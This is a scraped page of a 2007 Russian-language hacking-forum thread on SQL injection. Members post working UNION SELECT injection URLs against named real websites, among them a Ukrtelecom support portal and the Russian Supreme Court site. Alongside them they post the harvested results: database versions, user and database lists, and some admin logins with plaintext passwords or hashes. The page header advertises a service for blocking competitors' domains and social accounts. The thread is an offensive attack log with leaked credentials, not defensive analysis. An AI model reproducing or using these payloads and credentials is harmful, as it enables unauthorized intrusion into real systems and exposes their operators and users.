Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 356 из 1242

356

Опции темы

Поиск в этой теме

Опции просмотра

#3551

04.11.2007, 23:22

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

Отправить сообщение для big_BRAT с помощью ICQ

http://support.kharkiv.ukrtelecom.ua/

Код:

http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,current_database()||chr(58)||version()||chr(58)||current_user,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--

Общая информация:
support:PostgreSQL 7.3.18 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5):reader
==========================================

Код:

http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,usename||chr(58)||passwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user--

Выбераем пользователей с "паролями":
pgsql:********
postgres:********
reader:********
writer:********
===========================================

Код:

http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user+where+usesuper=true--

Выбераем привилегированных пользователей:
postgres

к сожелению вытащить пароль из pg_shadow не получится, мы работаем от пользователя ридер(
==========================================

Код:

http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,datname,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_database--

выбираем существующии базы:
balakleya
bogoduhiv
callcenter
chuguyiv
cit
dergachi
forum
Gallery
games
izum
kalendar
krasnograd
kupyansk
lozova
mtz
news
opros
orderdsl
Phone
pool
postgres
radio
rayon
sc
support
template0
template1
vodolaga
vovchansk

#3552

04.11.2007, 23:53

min7

Участник форума

Регистрация: 03.09.2005

Сообщений: 123

Провел на форуме:
1896022

Репутация: 259

Код:

http://surcon.ru/pages.php?id=-18+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5/*

vodos68_admin@web2.100mb.net/vodos68_surcon/
4.0.25-standard

Код:

http://surcon.ru/pages.php?id=-18+union+select+1,concat_ws(0x3a,login,mail,password),3,4,5+from+users+limit+0,15/*

admin:123456

#3553

05.11.2007, 02:01

cardons

Познавший АНТИЧАТ

Регистрация: 19.07.2005

Сообщений: 1,000

Провел на форуме:
5868159

Репутация: 950

Народ к сожалению я нечего непонимаю в SQL Inj, но что мне делать вот такой ссылкой
http://192.168.99.8/modules.php?name=News&topic_id=3&pagenum='

#3554

05.11.2007, 03:10

KEHT33

Познающий

Регистрация: 26.11.2006

Сообщений: 49

Провел на форуме:
65459

Репутация: 79

Код HTML:

http://metalistfans.net/news.php?id=-939UNION%20SELECT%201,2,3,4,5,6,7,8,9/*

таблиц не нашёл ( КТо найдёт отпишитесь плз

Код HTML:

http://www.golodomor.org.ua/speech.php?id=-1562+UNION+SELECT+1,concat(user,0x3a,pass),3+From+users/*

Последний раз редактировалось KEHT33; 05.11.2007 в 03:46..

#3555

05.11.2007, 04:11

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

2KEHT33

Код:

http://metalistfans.net/news.php?id=-939UNION%20SELECT%201,2,3,name,5,6,7,8,9%20from%20forum/*

а таблицы с админами там может и не быть вобще...
ЗЫ как видно имена таблиц идут без префикса, хотя не факт

еще там есть табличка teams

__________________
Карфаген должен быть разрушен...

#3556

05.11.2007, 04:41

KEHT33

Познающий

Регистрация: 26.11.2006

Сообщений: 49

Провел на форуме:
65459

Репутация: 79

Цитата:

Сообщение от Scipio

2KEHT33

а таблицы с админами там может и не быть вобще...
ЗЫ как видно имена таблиц идут без префикса, хотя не факт

еще там есть табличка teams

ну вот тут с префиксом и тоже не нашёл )

Код HTML:

http://soft.tomck.com/reiting.php?link=47+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

#3557

05.11.2007, 15:13

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

Провел на форуме:
1373642

Репутация: 569

Код:

http://skr.su/?div=zakony&id=-111+union+select+1,2,3,4,5,6,7,8,9,10,concat(login ,0x3a,pass),12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45+from+users+limit+0,1/*

не понял что за пароли такие

#3558

05.11.2007, 16:18

min7

Участник форума

Регистрация: 03.09.2005

Сообщений: 123

Провел на форуме:
1896022

Репутация: 259

Код:

http://ivanpro.org/top_menu.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18/*

ivanproorg@localhost/ivanproorg/5.0.22-Debian_2-log

Код:

http://ivanpro.org/top_menu.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,admin_login,admin_pass,admin_mail),9,10,11,12,13,14,15,16,17,18+from+auto_ws_admin_option+limit+0,1/*

admin:pass:www.websmith.ru
Админку не нашёл...

#3559

05.11.2007, 16:51

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

Провел на форуме:
1698585

Репутация: 818

Отправить сообщение для b3 с помощью ICQ

Цитата:

_http://partytown.ru/people.php?id=-3+union+select+1,2,concat_ws(0x3a,username,icq,pas sword),4+from+chatusers+limit+1,1

Tonikk:120853239:2e4b6dc525afb5cb

Цитата:

_http://www.iwf.ru/main/top.php?id=7+union+select+1,2,concat_ws(0x3a,login ,passw),4+from+main

Alla2:asdf
Rahashan

oiu:1
Lavel:asdf:0
Vesta:aszx:0
users>username>password>accesslevel
test:test:0

#3560

05.11.2007, 22:15

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Верховный суд РФ

Код:

http://www.supcourt.ru/courts_m.php?b=-2005)+union+select+aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71)+from+mysql.user/*

работает на винде
мускул 5-ветки
пароли и логины пользователей БД по линку на странице
(их 3)

вот вывод всех таблиц и колонок:

Код:

http://www.supcourt.ru/courts_m.php?b=-2005)+union+select+aes_decrypt(aes_encrypt(concat(table_name,0x3a,column_name),0x71),0x71)+from+information_schema.columns/*

(сначала линки неправильные дал, из браузера скопировал неправильно, сейчас исправил, линки рабочие)

__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 05.11.2007 в 22:27..

Страница 356 из 1242

356

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход